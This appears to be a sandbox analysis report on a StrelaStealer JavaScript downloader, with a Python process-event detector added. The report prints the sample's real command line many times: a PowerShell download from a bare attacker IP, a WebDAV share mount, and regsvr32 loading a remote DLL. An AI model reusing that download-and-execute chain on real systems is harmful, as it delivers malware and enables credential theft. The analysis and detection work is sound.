
Windows Analysis Report
1475127682155276.js

Overview

General Information

Sample name: 1475127682155276.js
Analysis ID: 1591624
MD5: 453599a731336818e0b53408cc447545
SHA1: f887fc09c17d9b2fc6e1a9306017c31c5bcc7d72
SHA256: 22b518169a28cf8a86401430ef8812a420bb256ee20473c18d87e07295befe0f
Tags: js, StrelaStealer, user-cocaman

Detection

Strela Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Strela Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Gathers information about network shares
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JavaScript / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 320 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1868 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 1848 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7184 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • cmd.exe (PID: 7064 cmdline: cmd /c net use \\193.143.1.205@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3720 cmdline: net use \\193.143.1.205@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • svchost.exe (PID: 7248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
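The process tree above is the whole infection chain in one cmd.exe command line: wscript.exe runs the .js, which spawns cmd.exe; cmd.exe runs PowerShell to fetch a decoy invoice.pdf from a bare IP, opens it to keep the victim busy, mounts `\\193.143.1.205@8888\davwwwroot\` (the Windows WebClient UNC form for WebDAV on TCP/8888), and finally would run `regsvr32 /s` on a DLL living on that share. The following detection logic is an added example written for this page, not code from Joe Sandbox or from the sample: it walks process-creation events with Sysmon-style field names (Image, CommandLine, ParentImage; the events are constructed here from the tree's own PIDs and command lines) and flags the same four behaviours the Sigma hits in the System Summary key on: script host spawning a shell, Invoke-WebRequest to a literal IP, a `davwwwroot` WebDAV path in any command line, and regsvr32 pointed at a UNC DLL.

```python
"""Process-creation detections for the chain in this report: wscript -> cmd ->
powershell Invoke-WebRequest (decoy PDF) -> net use / regsvr32 over WebDAV.

The events below are constructed for this example from the command lines in the
process tree; field names follow Sysmon Event ID 1 (Image, CommandLine,
ParentImage) but nothing here is read from a real log.
"""
import re
from dataclasses import dataclass

# \\host[@SSL][@port]\davwwwroot\... is the Windows WebClient (WebDAV
# mini-redirector) UNC form: "net use" and regsvr32 resolve it over HTTP(S),
# so a DLL "registered" from such a path is fetched from the remote server.
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[\w.-]+)(?P<ssl>@SSL)?(?:@(?P<port>\d{1,5}))?\\davwwwroot", re.I)
# regsvr32 [/flags ...] \\...\something.dll : DLL loaded from a UNC path.
REGSVR32_UNC = re.compile(r'regsvr32(?:\.exe)?\s+(?:/\S+\s+)*(\\\\[^\s"&]+\.dll)', re.I)
# Invoke-WebRequest aimed at a literal IPv4 address instead of a hostname.
DIRECT_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?=[/\s\x22]|$)", re.I)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, detection_name, detail) tuples for every event that trips a rule."""
    findings = []
    for ev in events:
        image, parent, cl = _basename(ev.image), _basename(ev.parent_image), ev.command_line
        if parent in SCRIPT_HOSTS and image in SHELLS:
            findings.append((ev.pid, "script_host_spawns_shell", f"{parent} -> {image}"))
        if "invoke-webrequest" in cl.lower():
            for m in DIRECT_IP_URL.finditer(cl):
                findings.append((ev.pid, "invoke_webrequest_direct_ip", m.group(0)))
        for m in WEBDAV_UNC.finditer(cl):
            port = m["port"] or ("443" if m["ssl"] else "80")   # WebClient defaults
            findings.append((ev.pid, "webdav_unc_path", f"{m['host']}:{port}"))
        m = REGSVR32_UNC.search(cl)
        if m:
            findings.append((ev.pid, "regsvr32_remote_dll", m.group(1)))
    return findings


# Constructed from the report's process tree (PIDs and command lines as listed there).
SAMPLE_EVENTS = [
    ProcEvent(320, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js"'),
    ProcEvent(6396, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile '
              r'C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"'
              r'&&start C:\Users\user\AppData\Local\Temp\invoice.pdf'
              r'&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s '
              r'\\193.143.1.205@8888\davwwwroot\13188269477300.dll',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(1868, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -Command "Invoke-WebRequest -OutFile '
              r'C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(7064, r"C:\Windows\System32\cmd.exe",
              "cmd /c net use \\\\193.143.1.205@8888\\davwwwroot\\", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(3720, r"C:\Windows\System32\net.exe",
              "net use \\\\193.143.1.205@8888\\davwwwroot\\", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, name, detail in detect(SAMPLE_EVENTS):
        print(f"PID {pid:>5}  {name:<28} {detail}")
```

Note that regsvr32.exe never appears as a process in the tree (the chain stops at net.exe), so a rule that only looks at the image name of the regsvr32 process would miss this sample; matching the regsvr32 invocation inside the parent cmd.exe command line is what catches the staged DLL load before it happens.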
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: wscript.exe PID: 320 | JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |

    System Summary

    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ProcessId: 320, ProcessName: wscript.exe
    Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 193.143.1.205, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3720, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86') | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Hieu Tran | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ProcessId: 320, ProcessName: wscript.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6396, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1868, ProcessName: powershell.exe
    Source: Process started | Author: frack113 | Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7064, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3720, ProcessName: net.exe
    Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7248, ProcessName: svchost.exe
    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7064, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3720, ProcessName: net.exe

    HIPS / PFW / Operating System Protection Evasion

    Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 320, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll, ProcessId: 6396, ProcessName: cmd.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-15T08:13:08.891125+0100 | 2859560 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 193.143.1.205 | 80 | TCP
    2025-01-15T08:13:11.279119+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 193.143.1.205 | 8888 | TCP
    2025-01-15T08:13:08.891125+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 193.143.1.205 | 80 | TCP


    AV Detection

    Source: 1475127682155276.js | Virustotal: Detection: 9%

    Software Vulnerabilities

    Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    Source: Network traffic | Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49705 -> 193.143.1.205:8888
    Source: Network traffic | Suricata IDS: 2859560 - Severity 1 - ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET) : 192.168.2.5:49704 -> 193.143.1.205:80
